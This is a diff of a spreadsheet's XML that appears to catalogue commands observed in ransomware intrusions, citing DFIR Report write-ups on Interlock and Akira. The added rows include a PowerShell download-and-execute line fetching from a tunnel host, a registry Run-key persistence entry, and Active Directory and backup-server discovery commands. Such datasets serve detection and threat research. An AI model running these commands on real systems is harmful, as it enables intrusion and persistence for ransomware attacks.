@@ -11131,6 +11128,125 @@
   </si>
   <si>
     <t>ransom-eid1530</t>
+  </si>
+  <si>
+    <t>pshell,reg</t>
+  </si>
+  <si>
+    <t>{"date": "2025-07", "url": "https://thedfirreport.com/2025/07/14/kongtuke-filefix-leads-to-new-interlock-rat-variant/", "tags": ["interlock"]}</t>
+  </si>
+  <si>
+    <t>{"date": "2025-08", "url": "https://thedfirreport.com/2025/08/05/from-bing-search-to-ransomware-bumblebee-and-adaptixc2-deliver-akira/", "tags": ["akira"]}</t>
+  </si>
+  <si>
+    <t>"C:\Users\REDACTED\AppData\Roaming\php\php.exe" -d extension=zip -d extension_dir=ext C:\Users\\AppData\Roaming\php\wefs.cfg 1</t>
+  </si>
+  <si>
+    <t>"powershell.exe" -ep Bypass -w H -c "schtasks /delete /tn Updater /f; $w=New-Object System.Net.WebClient ; $w.Headers.Add(\"User-Agent\", \"PowerShell\") ; $w.DownloadString(\"http://deadly-programming-attorneys-our.trycloudflare.com\") | iex"</t>
+  </si>
+  <si>
+    <t>cmd.exe /s /c "powershell -c Get-NetNeighbor -AddressFamily IPv4 | Where-Object { $_.State -ne 'Permanent' } |
+            Select-Object @{Name='Interface'; Expression={$_.InterfaceAlias}},
+                          @{Name='Internet Address'; Expression={$_.IPAddress}},
+                          @{Name='Physical Address'; Expression={$_.LinkLayerAddress}},
+                          @{Name='Type'; Expression={'dynamic'}} |
+            ConvertTo-Json"</t>
+  </si>
+  <si>
+    <t>cmd.exe /s /c "powershell -c "systeminfo /FO CSV | ConvertFrom-Csv | ConvertTo-Json""</t>
+  </si>
+  <si>
+    <t>cmd.exe /s /c "powershell -c "if ([Security.Principal.WindowsIdentity]::GetCurrent().Name -match '(?i)SYSTEM') { 'SYSTEM' } elseif (([Security.Principal.WindowsPrincipal] [Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { 'ADMIN' } else { 'USER' } ""</t>
+  </si>
+  <si>
+    <t>cmd.exe /s /c "powershell -c "tasklist /svc /FO CSV | ConvertFrom-Csv | ConvertTo-Json""</t>
+  </si>
+  <si>
+    <t>cmd.exe /s /c "powershell -c "Get-Service | Select-Object -Property Name, DisplayName | ConvertTo-Json""</t>
+  </si>
+  <si>
+    <t>cmd.exe /s /c "powershell -c "Get-PSDrive -PSProvider FileSystem | ConvertTo-Json""</t>
+  </si>
+  <si>
+    <t>cmd.exe /s /c "powershell -WindowStyle Hidden -Command "echo AD_Computers: ([adsiSearcher]\"(ObjectClass=computer)\").FindAll().count""</t>
+  </si>
+  <si>
+    <t>cmd.exe /s /c "powershell -Command "$searcher = [adsisearcher]'(&amp;(objectCategory=user)(description=*))'; $searcher.PropertiesToLoad.Add('samaccountname'); $searcher.PropertiesToLoad.Add('description'); $results = $searcher.FindAll(); foreach ($result in $results) { $result.Properties['samaccountname'][0] + ' - ' + $result.Properties['description'][0] }""</t>
+  </si>
+  <si>
+    <t>cmd.exe /s /c "net user %%USERNAME%% /domain"</t>
+  </si>
+  <si>
+    <t>cmd.exe /s /c "powershell -Command "$searcher = New-Object DirectoryServices.DirectorySearcher '(&amp;(objectCategory=computer))'; $searcher.PropertiesToLoad.Add('name') | Out-Null; $searcher.PropertiesToLoad.Add('description') | Out-Null; $results = $searcher.FindAll(); foreach ($result in $results) { $computerName = $result.Properties['name'][0]; if ($computerName -match '(?i)VB|VBR|VEEA|VEEAM|BCK|BACK') { $desc = $result.Properties['description']; if ($desc -and $desc[0]) { Write-Output \"${computerName} - $($desc[0])\" } else { Write-Output \"$computerName\" } } }""</t>
+  </si>
+  <si>
+    <t>cmd.exe /s /c "tasklist"</t>
+  </si>
+  <si>
+    <t>cmd.exe /s /c "nltest /dclist:"</t>
+  </si>
+  <si>
+    <t>cmd.exe /s /c "whoami"</t>
+  </si>
+  <si>
+    <t>cmd.exe /s /c "dir %%appdata%%"</t>
+  </si>
+  <si>
+    <t>reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "REDACTED" /t REG_SZ /d ""C:\Users\REDACTED\AppData\Roaming\php\php.exe" "C:\Users\REDACTED\AppData\Roaming\php\wefs.cfg"" /f</t>
+  </si>
+  <si>
+    <t xml:space="preserve"> netclt</t>
+  </si>
+  <si>
+    <t>ransom-eid1531</t>
+  </si>
+  <si>
+    <t>ransom-eid1532</t>
+  </si>
+  <si>
+    <t>ransom-eid1533</t>
+  </si>
+  <si>
+    <t>ransom-eid1534</t>
+  </si>
+  <si>
+    <t>ransom-eid1535</t>
+  </si>
+  <si>
+    <t>ransom-eid1536</t>
+  </si>
+  <si>
+    <t>ransom-eid1537</t>
+  </si>
+  <si>
+    <t>ransom-eid1538</t>
+  </si>
+  <si>
+    <t>ransom-eid1539</t>
+  </si>
+  <si>
+    <t>ransom-eid1540</t>
+  </si>
+  <si>
+    <t>ransom-eid1541</t>
+  </si>
+  <si>
+    <t>ransom-eid1542</t>
+  </si>
+  <si>
+    <t>ransom-eid1543</t>
+  </si>
+  <si>
+    <t>ransom-eid1544</t>
+  </si>
+  <si>
+    <t>ransom-eid1545</t>
+  </si>
+  <si>
+    <t>ransom-eid1546</t>
+  </si>
+  <si>
+    <t>ransom-eid1547</t>
   </si>
 </sst>
 </file>
@@ -11249,7 +11365,7 @@
   <cellStyleXfs count="1">
     <xf numFmtId="0" fontId="0" fillId="0" borderId="0"/>
   </cellStyleXfs>
-  <cellXfs count="27">
+  <cellXfs count="25">
     <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0"/>
     <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" applyAlignment="1">
       <alignment wrapText="1"/>
@@ -11307,12 +11423,6 @@
       <alignment wrapText="1"/>
     </xf>
     <xf numFmtId="0" fontId="0" fillId="0" borderId="1" xfId="0" applyBorder="1" applyAlignment="1">
-      <alignment wrapText="1"/>
-    </xf>
-    <xf numFmtId="0" fontId="2" fillId="0" borderId="0" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
-      <alignment wrapText="1"/>
-    </xf>
-    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" applyBorder="1" applyAlignment="1">
       <alignment wrapText="1"/>
     </xf>
   </cellXfs>
@@ -36009,7 +36119,7 @@
 </file>
 
 <file path=xl/pivotTables/pivotTable1.xml><?xml version="1.0" encoding="utf-8"?>
-<pivotTableDefinition xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" mc:Ignorable="xr" xr:uid="{CD651AB4-6668-E04C-AE05-A469DFE9C74D}" name="PivotTable1" cacheId="13" applyNumberFormats="0" applyBorderFormats="0" applyFontFormats="0" applyPatternFormats="0" applyAlignmentFormats="0" applyWidthHeightFormats="1" dataCaption="Values" updatedVersion="8" minRefreshableVersion="3" useAutoFormatting="1" itemPrintTitles="1" createdVersion="8" indent="0" outline="1" outlineData="1" multipleFieldFilters="0">
+<pivotTableDefinition xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" mc:Ignorable="xr" xr:uid="{CD651AB4-6668-E04C-AE05-A469DFE9C74D}" name="PivotTable1" cacheId="18" applyNumberFormats="0" applyBorderFormats="0" applyFontFormats="0" applyPatternFormats="0" applyAlignmentFormats="0" applyWidthHeightFormats="1" dataCaption="Values" updatedVersion="8" minRefreshableVersion="3" useAutoFormatting="1" itemPrintTitles="1" createdVersion="8" indent="0" outline="1" outlineData="1" multipleFieldFilters="0">
   <location ref="A3:C40" firstHeaderRow="0" firstDataRow="1" firstDataCol="1"/>
   <pivotFields count="12">
     <pivotField dataField="1" showAll="0"/>
@@ -36275,7 +36385,7 @@
 </file>
 
 <file path=xl/pivotTables/pivotTable2.xml><?xml version="1.0" encoding="utf-8"?>
-<pivotTableDefinition xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" mc:Ignorable="xr" xr:uid="{4823DE75-AE98-E44F-BAB0-EBEF926044F6}" name="PivotTable2" cacheId="14" applyNumberFormats="0" applyBorderFormats="0" applyFontFormats="0" applyPatternFormats="0" applyAlignmentFormats="0" applyWidthHeightFormats="1" dataCaption="Values" updatedVersion="8" minRefreshableVersion="3" useAutoFormatting="1" itemPrintTitles="1" createdVersion="8" indent="0" outline="1" outlineData="1" multipleFieldFilters="0">
+<pivotTableDefinition xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" mc:Ignorable="xr" xr:uid="{4823DE75-AE98-E44F-BAB0-EBEF926044F6}" name="PivotTable2" cacheId="19" applyNumberFormats="0" applyBorderFormats="0" applyFontFormats="0" applyPatternFormats="0" applyAlignmentFormats="0" applyWidthHeightFormats="1" dataCaption="Values" updatedVersion="8" minRefreshableVersion="3" useAutoFormatting="1" itemPrintTitles="1" createdVersion="8" indent="0" outline="1" outlineData="1" multipleFieldFilters="0">
   <location ref="A3:C13" firstHeaderRow="0" firstDataRow="1" firstDataCol="1"/>
   <pivotFields count="11">
     <pivotField dataField="1" showAll="0"/>
@@ -36376,7 +36486,7 @@
 </file>
 
 <file path=xl/pivotTables/pivotTable3.xml><?xml version="1.0" encoding="utf-8"?>
-<pivotTableDefinition xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" mc:Ignorable="xr" xr:uid="{521E2462-842F-E848-A822-99B1A4557465}" name="PivotTable3" cacheId="15" applyNumberFormats="0" applyBorderFormats="0" applyFontFormats="0" applyPatternFormats="0" applyAlignmentFormats="0" applyWidthHeightFormats="1" dataCaption="Values" updatedVersion="8" minRefreshableVersion="3" useAutoFormatting="1" itemPrintTitles="1" createdVersion="8" indent="0" outline="1" outlineData="1" multipleFieldFilters="0">
+<pivotTableDefinition xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" mc:Ignorable="xr" xr:uid="{521E2462-842F-E848-A822-99B1A4557465}" name="PivotTable3" cacheId="20" applyNumberFormats="0" applyBorderFormats="0" applyFontFormats="0" applyPatternFormats="0" applyAlignmentFormats="0" applyWidthHeightFormats="1" dataCaption="Values" updatedVersion="8" minRefreshableVersion="3" useAutoFormatting="1" itemPrintTitles="1" createdVersion="8" indent="0" outline="1" outlineData="1" multipleFieldFilters="0">
   <location ref="A3:C20" firstHeaderRow="0" firstDataRow="1" firstDataCol="1"/>
   <pivotFields count="10">
     <pivotField dataField="1" showAll="0"/>
@@ -36510,7 +36620,7 @@
 </file>
 
 <file path=xl/pivotTables/pivotTable4.xml><?xml version="1.0" encoding="utf-8"?>
-<pivotTableDefinition xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" mc:Ignorable="xr" xr:uid="{672A2247-37C7-B146-8C14-B1A4D372E94E}" name="PivotTable4" cacheId="16" applyNumberFormats="0" applyBorderFormats="0" applyFontFormats="0" applyPatternFormats="0" applyAlignmentFormats="0" applyWidthHeightFormats="1" dataCaption="Values" updatedVersion="8" minRefreshableVersion="3" useAutoFormatting="1" itemPrintTitles="1" createdVersion="8" indent="0" outline="1" outlineData="1" multipleFieldFilters="0">
+<pivotTableDefinition xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" mc:Ignorable="xr" xr:uid="{672A2247-37C7-B146-8C14-B1A4D372E94E}" name="PivotTable4" cacheId="21" applyNumberFormats="0" applyBorderFormats="0" applyFontFormats="0" applyPatternFormats="0" applyAlignmentFormats="0" applyWidthHeightFormats="1" dataCaption="Values" updatedVersion="8" minRefreshableVersion="3" useAutoFormatting="1" itemPrintTitles="1" createdVersion="8" indent="0" outline="1" outlineData="1" multipleFieldFilters="0">
   <location ref="A3:C40" firstHeaderRow="0" firstDataRow="1" firstDataCol="1"/>
   <pivotFields count="8">
     <pivotField dataField="1" showAll="0"/>
@@ -36746,10 +36856,10 @@
 </file>
 
 <file path=xl/tables/table1.xml><?xml version="1.0" encoding="utf-8"?>
-<table xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" xmlns:xr3="http://schemas.microsoft.com/office/spreadsheetml/2016/revision3" mc:Ignorable="xr xr3" id="1" xr:uid="{B6B8DB85-BB20-8546-B15A-D0F5310E33C2}" name="Table1" displayName="Table1" ref="A1:L1530" totalsRowShown="0" headerRowDxfId="23">
-  <autoFilter ref="A1:L1530" xr:uid="{B6B8DB85-BB20-8546-B15A-D0F5310E33C2}"/>
-  <sortState xmlns:xlrd2="http://schemas.microsoft.com/office/spreadsheetml/2017/richdata2" ref="A2:L1517">
-    <sortCondition ref="A1:A1517"/>
+<table xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" xmlns:xr3="http://schemas.microsoft.com/office/spreadsheetml/2016/revision3" mc:Ignorable="xr xr3" id="1" xr:uid="{B6B8DB85-BB20-8546-B15A-D0F5310E33C2}" name="Table1" displayName="Table1" ref="A1:L1547" totalsRowShown="0" headerRowDxfId="23">
+  <autoFilter ref="A1:L1547" xr:uid="{B6B8DB85-BB20-8546-B15A-D0F5310E33C2}"/>
+  <sortState xmlns:xlrd2="http://schemas.microsoft.com/office/spreadsheetml/2017/richdata2" ref="A2:L1530">
+    <sortCondition ref="A1:A1530"/>
   </sortState>
   <tableColumns count="12">
     <tableColumn id="1" xr3:uid="{23FD2D36-2698-2541-9FC1-93976DA52D32}" name="delta_eid"/>
@@ -37234,11 +37344,11 @@
 
 <file path=xl/worksheets/sheet1.xml><?xml version="1.0" encoding="utf-8"?>
 <worksheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:x14ac="http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" xmlns:xr2="http://schemas.microsoft.com/office/spreadsheetml/2015/revision2" xmlns:xr3="http://schemas.microsoft.com/office/spreadsheetml/2016/revision3" mc:Ignorable="x14ac xr xr2 xr3" xr:uid="{9549A292-5E18-1D44-9D7A-060851331C4E}">
-  <dimension ref="A1:L1530"/>
+  <dimension ref="A1:L1547"/>
   <sheetViews>
     <sheetView tabSelected="1" workbookViewId="0">
-      <pane ySplit="1" topLeftCell="A1499" activePane="bottomLeft" state="frozen"/>
-      <selection pane="bottomLeft" activeCell="C1521" sqref="C1521"/>
+      <pane ySplit="1" topLeftCell="A1538" activePane="bottomLeft" state="frozen"/>
+      <selection pane="bottomLeft" activeCell="L1531" sqref="L1531:L1547"/>
     </sheetView>
   </sheetViews>
   <sheetFormatPr baseColWidth="10" defaultRowHeight="16" x14ac:dyDescent="0.2"/>
@@ -37824,7 +37934,7 @@
         <v>42</v>
       </c>
       <c r="E32" s="1"/>
-      <c r="L32" s="26" t="s">
+      <c r="L32" s="1" t="s">
         <v>3099</v>
       </c>
     </row>
@@ -38260,7 +38370,7 @@
         <v>67</v>
       </c>
       <c r="E62" s="1"/>
-      <c r="L62" s="26" t="s">
+      <c r="L62" s="1" t="s">
         <v>3099</v>
       </c>
     </row>
@@ -39763,7 +39873,7 @@
         <v>248</v>
       </c>
       <c r="E147" s="1"/>
-      <c r="L147" s="26" t="s">
+      <c r="L147" s="1" t="s">
         <v>3096</v>
       </c>
     </row>
@@ -39823,7 +39933,7 @@
         <v>251</v>
       </c>
       <c r="E151" s="1"/>
-      <c r="L151" s="26" t="s">
+      <c r="L151" s="1" t="s">
         <v>3096</v>
       </c>
     </row>
@@ -39866,7 +39976,7 @@
         <v>254</v>
       </c>
       <c r="E154" s="1"/>
-      <c r="L154" s="26" t="s">
+      <c r="L154" s="1" t="s">
         <v>3096</v>
       </c>
     </row>
@@ -39967,7 +40077,7 @@
       <c r="B161" t="s">
         <v>3509</v>
       </c>
-      <c r="D161" s="26" t="s">
+      <c r="D161" s="1" t="s">
         <v>264</v>
       </c>
       <c r="E161" s="1" t="s">
@@ -40002,7 +40112,7 @@
       <c r="B163" t="s">
         <v>3508</v>
       </c>
-      <c r="D163" s="26" t="s">
+      <c r="D163" s="1" t="s">
         <v>288</v>
       </c>
       <c r="E163" s="1"/>
@@ -40278,7 +40388,7 @@
         <v>314</v>
       </c>
       <c r="E181" s="1"/>
-      <c r="L181" s="26" t="s">
+      <c r="L181" s="1" t="s">
         <v>3101</v>
       </c>
     </row>
@@ -40336,7 +40446,7 @@
         <v>318</v>
       </c>
       <c r="E185" s="1"/>
-      <c r="L185" s="26" t="s">
+      <c r="L185" s="1" t="s">
         <v>3101</v>
       </c>
     </row>
@@ -40474,7 +40584,7 @@
         <v>356</v>
       </c>
       <c r="E194" s="1"/>
-      <c r="L194" s="26" t="s">
+      <c r="L194" s="1" t="s">
         <v>3113</v>
       </c>
     </row>
@@ -40561,7 +40671,7 @@
       <c r="C200" s="1" t="s">
         <v>108</v>
       </c>
-      <c r="D200" s="26" t="s">
+      <c r="D200" s="1" t="s">
         <v>362</v>
       </c>
       <c r="E200" s="1"/>
@@ -40669,7 +40779,7 @@
       <c r="B207" t="s">
         <v>3138</v>
       </c>
-      <c r="D207" s="26" t="s">
+      <c r="D207" s="1" t="s">
         <v>369</v>
       </c>
       <c r="E207" s="1"/>
@@ -40684,7 +40794,7 @@
       <c r="B208" t="s">
         <v>3138</v>
       </c>
-      <c r="D208" s="26" t="s">
+      <c r="D208" s="1" t="s">
         <v>370</v>
       </c>
       <c r="E208" s="1"/>
@@ -41184,7 +41294,7 @@
         <v>1430</v>
       </c>
       <c r="B241" t="s">
-        <v>3082</v>
+        <v>3667</v>
       </c>
       <c r="D241" s="1" t="s">
         <v>425</v>
@@ -41310,7 +41420,7 @@
         <v>433</v>
       </c>
       <c r="E249" s="1"/>
-      <c r="L249" s="26" t="s">
+      <c r="L249" s="1" t="s">
         <v>3114</v>
       </c>
     </row>
@@ -41965,7 +42075,7 @@
         <v>473</v>
       </c>
       <c r="E292" s="1"/>
-      <c r="L292" s="26" t="s">
+      <c r="L292" s="1" t="s">
         <v>3114</v>
       </c>
     </row>
@@ -41980,7 +42090,7 @@
         <v>474</v>
       </c>
       <c r="E293" s="1"/>
-      <c r="L293" s="26" t="s">
+      <c r="L293" s="1" t="s">
         <v>3114</v>
       </c>
     </row>
@@ -42171,7 +42281,7 @@
         <v>488</v>
       </c>
       <c r="E306" s="1"/>
-      <c r="L306" s="26" t="s">
+      <c r="L306" s="1" t="s">
         <v>3083</v>
       </c>
     </row>
@@ -42529,7 +42639,7 @@
         <v>505</v>
       </c>
       <c r="E330" s="1"/>
-      <c r="L330" s="26" t="s">
+      <c r="L330" s="1" t="s">
         <v>3084</v>
       </c>
     </row>
@@ -42748,7 +42858,7 @@
       <c r="B345" t="s">
         <v>3508</v>
       </c>
-      <c r="D345" s="26" t="s">
+      <c r="D345" s="1" t="s">
         <v>515</v>
       </c>
       <c r="E345" s="1"/>
@@ -42793,7 +42903,7 @@
       <c r="B348" t="s">
         <v>3508</v>
       </c>
-      <c r="D348" s="26" t="s">
+      <c r="D348" s="1" t="s">
         <v>518</v>
       </c>
       <c r="E348" s="1"/>
@@ -42917,7 +43027,7 @@
         <v>524</v>
       </c>
       <c r="E356" s="1"/>
-      <c r="L356" s="26" t="s">
+      <c r="L356" s="1" t="s">
         <v>3085</v>
       </c>
     </row>
@@ -43316,7 +43426,7 @@
       <c r="B383" t="s">
         <v>3510</v>
       </c>
-      <c r="D383" s="26" t="s">
+      <c r="D383" s="1" t="s">
         <v>546</v>
       </c>
       <c r="E383" s="1"/>
@@ -43335,7 +43445,7 @@
         <v>547</v>
       </c>
       <c r="E384" s="1"/>
-      <c r="L384" s="26" t="s">
+      <c r="L384" s="1" t="s">
         <v>3086</v>
       </c>
     </row>
@@ -43689,7 +43799,7 @@
       <c r="B402" t="s">
         <v>3508</v>
       </c>
-      <c r="D402" s="26" t="s">
+      <c r="D402" s="1" t="s">
         <v>559</v>
       </c>
       <c r="E402" s="1" t="s">
@@ -43796,7 +43906,7 @@
         <v>570</v>
       </c>
       <c r="E408" s="1"/>
-      <c r="L408" s="26" t="s">
+      <c r="L408" s="1" t="s">
         <v>3087</v>
       </c>
     </row>
@@ -44081,7 +44191,7 @@
         <v>579</v>
       </c>
       <c r="E427" s="1"/>
-      <c r="L427" s="26" t="s">
+      <c r="L427" s="1" t="s">
         <v>3087</v>
       </c>
     </row>
@@ -44096,7 +44206,7 @@
         <v>580</v>
       </c>
       <c r="E428" s="1"/>
-      <c r="L428" s="26" t="s">
+      <c r="L428" s="1" t="s">
         <v>3087</v>
       </c>
     </row>
@@ -44440,7 +44550,7 @@
         <v>617</v>
       </c>
       <c r="E451" s="1"/>
-      <c r="L451" s="26" t="s">
+      <c r="L451" s="1" t="s">
         <v>655</v>
       </c>
     </row>
@@ -44714,7 +44824,7 @@
         <v>433</v>
       </c>
       <c r="E468" s="1"/>
-      <c r="L468" s="26" t="s">
+      <c r="L468" s="1" t="s">
         <v>655</v>
       </c>
     </row>
@@ -44965,7 +45075,7 @@
         <v>648</v>
       </c>
       <c r="E483" s="1"/>
-      <c r="L483" s="26" t="s">
+      <c r="L483" s="1" t="s">
         <v>655</v>
       </c>
     </row>
@@ -44980,7 +45090,7 @@
         <v>649</v>
       </c>
       <c r="E484" s="1"/>
-      <c r="L484" s="26" t="s">
+      <c r="L484" s="1" t="s">
         <v>655</v>
       </c>
     </row>
@@ -45242,7 +45352,7 @@
         <v>670</v>
       </c>
       <c r="E502" s="1"/>
-      <c r="L502" s="26" t="s">
+      <c r="L502" s="1" t="s">
         <v>3094</v>
       </c>
     </row>
@@ -45257,7 +45367,7 @@
         <v>671</v>
       </c>
       <c r="E503" s="1"/>
-      <c r="L503" s="26" t="s">
+      <c r="L503" s="1" t="s">
         <v>3094</v>
       </c>
     </row>
@@ -45489,7 +45599,7 @@
         <v>686</v>
       </c>
       <c r="E519" s="1"/>
-      <c r="L519" s="26" t="s">
+      <c r="L519" s="1" t="s">
         <v>3093</v>
       </c>
     </row>
@@ -45504,7 +45614,7 @@
         <v>687</v>
       </c>
       <c r="E520" s="1"/>
-      <c r="L520" s="26" t="s">
+      <c r="L520" s="1" t="s">
         <v>3093</v>
       </c>
     </row>
@@ -45862,7 +45972,7 @@
         <v>701</v>
       </c>
       <c r="E544" s="1"/>
-      <c r="L544" s="26" t="s">
+      <c r="L544" s="1" t="s">
         <v>3093</v>
       </c>
     </row>
@@ -46046,7 +46156,7 @@
       <c r="E556" s="1" t="s">
         <v>730</v>
       </c>
-      <c r="L556" s="26" t="s">
+      <c r="L556" s="1" t="s">
         <v>3093</v>
       </c>
     </row>
@@ -46880,7 +46990,7 @@
       <c r="D611" s="1" t="s">
         <v>760</v>
       </c>
-      <c r="L611" s="26" t="s">
+      <c r="L611" s="1" t="s">
         <v>3088</v>
       </c>
     </row>
@@ -46903,7 +47013,7 @@
       <c r="B613" t="s">
         <v>3511</v>
       </c>
-      <c r="D613" s="26" t="s">
+      <c r="D613" s="1" t="s">
         <v>762</v>
       </c>
       <c r="L613" s="1" t="s">
@@ -46917,7 +47027,7 @@
       <c r="B614" t="s">
         <v>3511</v>
       </c>
-      <c r="D614" s="26" t="s">
+      <c r="D614" s="1" t="s">
         <v>763</v>
       </c>
       <c r="L614" s="1" t="s">
@@ -46987,7 +47097,7 @@
       <c r="B619" t="s">
         <v>3511</v>
       </c>
-      <c r="D619" s="26" t="s">
+      <c r="D619" s="1" t="s">
         <v>767</v>
       </c>
       <c r="L619" s="1" t="s">
@@ -48052,7 +48162,7 @@
         <v>857</v>
       </c>
       <c r="E690" s="1"/>
-      <c r="L690" s="25" t="s">
+      <c r="L690" s="19" t="s">
         <v>3111</v>
       </c>
     </row>
@@ -48067,7 +48177,7 @@
         <v>858</v>
       </c>
       <c r="E691" s="1"/>
-      <c r="L691" s="25" t="s">
+      <c r="L691" s="19" t="s">
         <v>3111</v>
       </c>
     </row>
@@ -48142,7 +48252,7 @@
         <v>863</v>
       </c>
       <c r="E696" s="1"/>
-      <c r="L696" s="25" t="s">
+      <c r="L696" s="19" t="s">
         <v>3111</v>
       </c>
     </row>
@@ -48513,7 +48623,7 @@
       <c r="B721" t="s">
         <v>3138</v>
       </c>
-      <c r="D721" s="26" t="s">
+      <c r="D721" s="1" t="s">
         <v>880</v>
       </c>
       <c r="E721" s="1"/>
@@ -50002,7 +50112,7 @@
         <v>1029</v>
       </c>
       <c r="E819" s="1"/>
-      <c r="L819" s="26" t="s">
+      <c r="L819" s="1" t="s">
         <v>3095</v>
       </c>
     </row>
@@ -50017,7 +50127,7 @@
         <v>1030</v>
       </c>
       <c r="E820" s="1"/>
-      <c r="L820" s="26" t="s">
+      <c r="L820" s="1" t="s">
         <v>3095</v>
       </c>
     </row>
@@ -50032,7 +50142,7 @@
         <v>1031</v>
       </c>
       <c r="E821" s="1"/>
-      <c r="L821" s="26" t="s">
+      <c r="L821" s="1" t="s">
         <v>3095</v>
       </c>
     </row>
@@ -50975,7 +51085,7 @@
         <v>1089</v>
       </c>
       <c r="E884" s="1"/>
-      <c r="L884" s="26" t="s">
+      <c r="L884" s="1" t="s">
         <v>3107</v>
       </c>
     </row>
@@ -51816,7 +51926,7 @@
         <v>1166</v>
       </c>
       <c r="E941" s="1"/>
-      <c r="L941" s="26" t="s">
+      <c r="L941" s="1" t="s">
         <v>3098</v>
       </c>
     </row>
@@ -52417,7 +52527,7 @@
         <v>2180</v>
       </c>
       <c r="E977" s="1"/>
-      <c r="L977" s="26" t="s">
+      <c r="L977" s="1" t="s">
         <v>3091</v>
       </c>
     </row>
@@ -52699,7 +52809,7 @@
         <v>2188</v>
       </c>
       <c r="E995" s="1"/>
-      <c r="L995" s="26" t="s">
+      <c r="L995" s="1" t="s">
         <v>3091</v>
       </c>
     </row>
@@ -52732,7 +52842,7 @@
         <v>2204</v>
       </c>
       <c r="E997" s="1"/>
-      <c r="L997" s="26" t="s">
+      <c r="L997" s="1" t="s">
         <v>3091</v>
       </c>
     </row>
@@ -52750,7 +52860,7 @@
         <v>2190</v>
       </c>
       <c r="E998" s="1"/>
-      <c r="L998" s="26" t="s">
+      <c r="L998" s="1" t="s">
         <v>3091</v>
       </c>
     </row>
@@ -53543,7 +53653,7 @@
       <c r="B1052" t="s">
         <v>3138</v>
       </c>
-      <c r="D1052" s="26" t="s">
+      <c r="D1052" s="1" t="s">
         <v>2345</v>
       </c>
       <c r="E1052" s="1"/>
@@ -55042,7 +55152,7 @@
         <v>2513</v>
       </c>
       <c r="E1143" s="1"/>
-      <c r="L1143" s="26" t="s">
+      <c r="L1143" s="1" t="s">
         <v>3105</v>
       </c>
     </row>
@@ -55057,7 +55167,7 @@
         <v>2514</v>
       </c>
       <c r="E1144" s="1"/>
-      <c r="L1144" s="26" t="s">
+      <c r="L1144" s="1" t="s">
         <v>3105</v>
       </c>
     </row>
@@ -55446,7 +55556,7 @@
         <v>18</v>
       </c>
       <c r="E1169" s="1"/>
-      <c r="L1169" s="26" t="s">
+      <c r="L1169" s="1" t="s">
         <v>3106</v>
       </c>
     </row>
@@ -55461,7 +55571,7 @@
         <v>155</v>
       </c>
       <c r="E1170" s="1"/>
-      <c r="L1170" s="26" t="s">
+      <c r="L1170" s="1" t="s">
         <v>3106</v>
       </c>
     </row>
@@ -55753,7 +55863,7 @@
         <v>2610</v>
       </c>
       <c r="E1190" s="1"/>
-      <c r="L1190" s="26" t="s">
+      <c r="L1190" s="1" t="s">
         <v>3106</v>
       </c>
     </row>
@@ -55768,7 +55878,7 @@
         <v>2611</v>
       </c>
       <c r="E1191" s="1"/>
-      <c r="L1191" s="26" t="s">
+      <c r="L1191" s="1" t="s">
         <v>3106</v>
       </c>
     </row>
@@ -56009,7 +56119,7 @@
       <c r="B1207" t="s">
         <v>3138</v>
       </c>
-      <c r="D1207" s="26" t="s">
+      <c r="D1207" s="1" t="s">
         <v>2692</v>
       </c>
       <c r="E1207" s="1" t="s">
@@ -56381,7 +56491,7 @@
         <v>18</v>
       </c>
       <c r="E1231" s="1"/>
-      <c r="L1231" s="26" t="s">
+      <c r="L1231" s="1" t="s">
         <v>3108</v>
       </c>
     </row>
@@ -56396,7 +56506,7 @@
         <v>155</v>
       </c>
       <c r="E1232" s="1"/>
-      <c r="L1232" s="26" t="s">
+      <c r="L1232" s="1" t="s">
         <v>3108</v>
       </c>
     </row>
@@ -56411,7 +56521,7 @@
         <v>2716</v>
       </c>
       <c r="E1233" s="1"/>
-      <c r="L1233" s="26" t="s">
+      <c r="L1233" s="1" t="s">
         <v>3108</v>
       </c>
     </row>
